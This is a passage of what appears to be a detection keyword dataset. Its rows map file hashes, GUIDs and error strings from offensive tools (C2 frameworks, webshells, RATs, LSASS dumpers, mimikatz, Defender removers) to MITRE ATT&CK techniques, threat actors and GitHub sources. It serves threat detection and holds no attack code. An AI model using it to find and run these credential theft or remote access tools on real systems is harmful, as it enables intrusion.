"*fa58b987e702e4213705ec9bfa01955f9cf4f5f4b8c43e91344bd8f997f83712*",".{0,1000}fa58b987e702e4213705ec9bfa01955f9cf4f5f4b8c43e91344bd8f997f83712.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","44362" "*fa63c897e614a228f3b176c98d8dee797c8df24ff7e487b023715255621ed292*",".{0,1000}fa63c897e614a228f3b176c98d8dee797c8df24ff7e487b023715255621ed292.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44363" 
"*fa66e3077a51a5ef7cb29ab869b483d7363e9bb58d84595de4e0b2b48e3df47b*",".{0,1000}fa66e3077a51a5ef7cb29ab869b483d7363e9bb58d84595de4e0b2b48e3df47b.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","44364" "*fa7433173643095d5266fd465f88de45d6d157d72dc5915ab1334c03af63b4ba*",".{0,1000}fa7433173643095d5266fd465f88de45d6d157d72dc5915ab1334c03af63b4ba.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","44366" "*fa769dac7a0a94ee47d8ebe021eaba9e*",".{0,1000}fa769dac7a0a94ee47d8ebe021eaba9e.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 ","N/A","EMBER BEAR - Sandworm","Persistence","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","N/A","default password md5","10","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","44367" "*fa77365a2b757aa8e3c0dea845aeb2e0ac77ab0f6138c140fd165da72ebbf098*",".{0,1000}fa77365a2b757aa8e3c0dea845aeb2e0ac77ab0f6138c140fd165da72ebbf098.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44368" 
"*fa7c589beeed7dfb870fb784b265063facd3b007c454256107e76bdc5991f422*",".{0,1000}fa7c589beeed7dfb870fb784b265063facd3b007c454256107e76bdc5991f422.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","44369" "*fa7eba4a7edb75f644eace116b7072d9edddfa0af672bd99091d9035b974ba21*",".{0,1000}fa7eba4a7edb75f644eace116b7072d9edddfa0af672bd99091d9035b974ba21.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","44370" "*fa88cbb335f5284f0c23e4182474314ab936ac37a6f0099e7539e2a0e992d255*",".{0,1000}fa88cbb335f5284f0c23e4182474314ab936ac37a6f0099e7539e2a0e992d255.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - 
TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","44372" "*fa8addfe13555c20633386fe8c9ceda53336fada732d984c214632ebb73063f2*",".{0,1000}fa8addfe13555c20633386fe8c9ceda53336fada732d984c214632ebb73063f2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44373" "*fa8ea8f183235df6d194ee66f9289be6e5020000d9eea029a3788da393db3b4a*",".{0,1000}fa8ea8f183235df6d194ee66f9289be6e5020000d9eea029a3788da393db3b4a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44374" "*fa8ff7e30ab51f8331ad6d9792d470406de52d66681c2b788361eb578558f913*",".{0,1000}fa8ff7e30ab51f8331ad6d9792d470406de52d66681c2b788361eb578558f913.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","44375" "*fa9719d556cd1b8b951f7c1f561881c99da7cf41f25c41d8a87fab113144226a*",".{0,1000}fa9719d556cd1b8b951f7c1f561881c99da7cf41f25c41d8a87fab113144226a.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","44376" "*fa994debde4c3fc87853ccf7667ed991e2c77a21c3ddd54c024588372a96d831*",".{0,1000}fa994debde4c3fc87853ccf7667ed991e2c77a21c3ddd54c024588372a96d831.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44378" "*fa9eb14e832e32c6a7bc4c1a2a4aa2db3c94a43316ac8d702a983db4bf2b4c68*",".{0,1000}fa9eb14e832e32c6a7bc4c1a2a4aa2db3c94a43316ac8d702a983db4bf2b4c68.{0,1000}","offensive_tool_keyword","WinPwnage","various 
exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","44379" "*fa9f88fe906846df3284e667263453cd96464c12d7f152ba27b2a5669a148c73*",".{0,1000}fa9f88fe906846df3284e667263453cd96464c12d7f152ba27b2a5669a148c73.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","44380" "*faa491fa7733cf0c51ffdcf97be3fd48231863ff59b4f6922e11bbb747bf1806*",".{0,1000}faa491fa7733cf0c51ffdcf97be3fd48231863ff59b4f6922e11bbb747bf1806.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","44381" "*FAA8C7E2-4409-44F5-B2CA-EBBA4D4F41F0*",".{0,1000}FAA8C7E2\-4409\-44F5\-B2CA\-EBBA4D4F41F0.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#GUIDproject","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","44383" "*faaafe6256f59d72d96a71d7c12dccb964338c7ef8b9dbf359503ccd2ce79e41*",".{0,1000}faaafe6256f59d72d96a71d7c12dccb964338c7ef8b9dbf359503ccd2ce79e41.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","44384" "*faab30099ca682a0b9f183c1e0319a6e16656e09bdcbfa410a590e07694c2850*",".{0,1000}faab30099ca682a0b9f183c1e0319a6e16656e09bdcbfa410a590e07694c2850.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","44385" "*fab5a95a10d4db67572f75b372b00c91484dbb600f14cc619f3cecefe2d117cf*",".{0,1000}fab5a95a10d4db67572f75b372b00c91484dbb600f14cc619f3cecefe2d117cf.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44387" "*faca9e856c369b63d6698c74b1d59b062a9a8d9fe84b8f753c299c9961026395*",".{0,1000}faca9e856c369b63d6698c74b1d59b062a9a8d9fe84b8f753c299c9961026395.{0,1000}","offensive_tool_keyword","passwordfox","recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox","T1555.003 - T1003 - T1083","TA0006 ","N/A","LockBit - GoGoogle - 8BASE - XDSpy","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","44388" "*fad2d0ab934c4637113555b877e2b3162b0db531baff55f1d4d20567df755d08*",".{0,1000}fad2d0ab934c4637113555b877e2b3162b0db531baff55f1d4d20567df755d08.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - 
Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","44389" "*fad52d687cfe0824b40ba5fd96a6a3034537fc33c59d628049de8b93c4364ce9*",".{0,1000}fad52d687cfe0824b40ba5fd96a6a3034537fc33c59d628049de8b93c4364ce9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44393" "*fad707c342f6f41c9f76434d28df10df06a52c924fd915b09951bd2c62294f7a*",".{0,1000}fad707c342f6f41c9f76434d28df10df06a52c924fd915b09951bd2c62294f7a.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44394" "*fadbef698c9003c4083458db5c37a5dc96791e3e8f532db1f386a53b3ff55776*",".{0,1000}fadbef698c9003c4083458db5c37a5dc96791e3e8f532db1f386a53b3ff55776.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - 
TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44396" "*fadfbd1210e864f660aabfc5cb6ae807721ae2d54df0e328d13bc62bcec66e6f*",".{0,1000}fadfbd1210e864f660aabfc5cb6ae807721ae2d54df0e328d13bc62bcec66e6f.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","44397" "*fadfbd1210e864f660aabfc5cb6ae807721ae2d54df0e328d13bc62bcec66e6f*",".{0,1000}fadfbd1210e864f660aabfc5cb6ae807721ae2d54df0e328d13bc62bcec66e6f.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - 
TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","44398" "*Fadi002/unshackle*",".{0,1000}Fadi002\/unshackle.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","#linux #windows","N/A","10","10","1899","125","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z","44399" "*faeb33a916c28f17388206689e255337bd5719690602b2b18c6577fdf036f9e4*",".{0,1000}faeb33a916c28f17388206689e255337bd5719690602b2b18c6577fdf036f9e4.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","44401" 
"*faf479fbf0d01c79ff3972881840913b6c18a24f2b51e7e29050c45760f0ea21*",".{0,1000}faf479fbf0d01c79ff3972881840913b6c18a24f2b51e7e29050c45760f0ea21.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","44404" "*faf7eccc7aa509a6ac4b65b15e5bd91101a21ec9dd519b9917e7f0ce5f9191e5*",".{0,1000}faf7eccc7aa509a6ac4b65b15e5bd91101a21ec9dd519b9917e7f0ce5f9191e5.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","44405" "*FAFE5A3C-05BC-4B6F-8BA4-2B95027CBFEA*",".{0,1000}FAFE5A3C\-05BC\-4B6F\-8BA4\-2B95027CBFEA.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#GUIDproject","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","44407" "*Fahrj/reverse-ssh*",".{0,1000}Fahrj\/reverse\-ssh.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","44408" "*fail to retrieve SAM hashs!*",".{0,1000}fail\sto\sretrieve\sSAM\shashs!.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - 
T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","44409" "*Failed in m1n1dumpIT:*",".{0,1000}Failed\sin\sm1n1dumpIT\:.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","44410" "*Failed logins before lockout is: *max_sam_lock*",".{0,1000}Failed\slogins\sbefore\slockout\sis\:\s.{0,1000}max_sam_lock.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","44411" "*Failed to allocate memory for shellcode:*",".{0,1000}Failed\sto\sallocate\smemory\sfor\sshellcode\:.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","44412" "*Failed to change shellcode memory protection*",".{0,1000}Failed\sto\schange\sshellcode\smemory\sprotection.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","44413" "*Failed to create a dump of the forked process*",".{0,1000}Failed\sto\screate\sa\sdump\sof\sthe\sforked\sprocess.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","44414" "*Failed to dump lsass*",".{0,1000}Failed\sto\sdump\slsass.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","44415" "*Failed to find rx section offset*",".{0,1000}Failed\sto\sfind\srx\ssection\soffset.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless 
Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","44416" "*Failed to hijack thread:*",".{0,1000}Failed\sto\shijack\sthread\:.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","44417" "*Failed to overwrite the .text section of ntdll.dll*",".{0,1000}Failed\sto\soverwrite\sthe\s\.text\ssection\sof\sntdll\.dll.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","44418" "*Failed to receive initial tun stream message:*",".{0,1000}Failed\sto\sreceive\sinitial\stun\sstream\smessage\:.{0,1000}","offensive_tool_keyword","gTunnel","tunneling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#content","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","44419" "*failed to shut down Tor -- possible bug in bine*",".{0,1000}failed\sto\sshut\sdown\sTor\s\-\-\spossible\sbug\sin\sbine.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","44421" "*Failed to write shellcode to target process*",".{0,1000}Failed\sto\swrite\sshellcode\sto\starget\sprocess.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
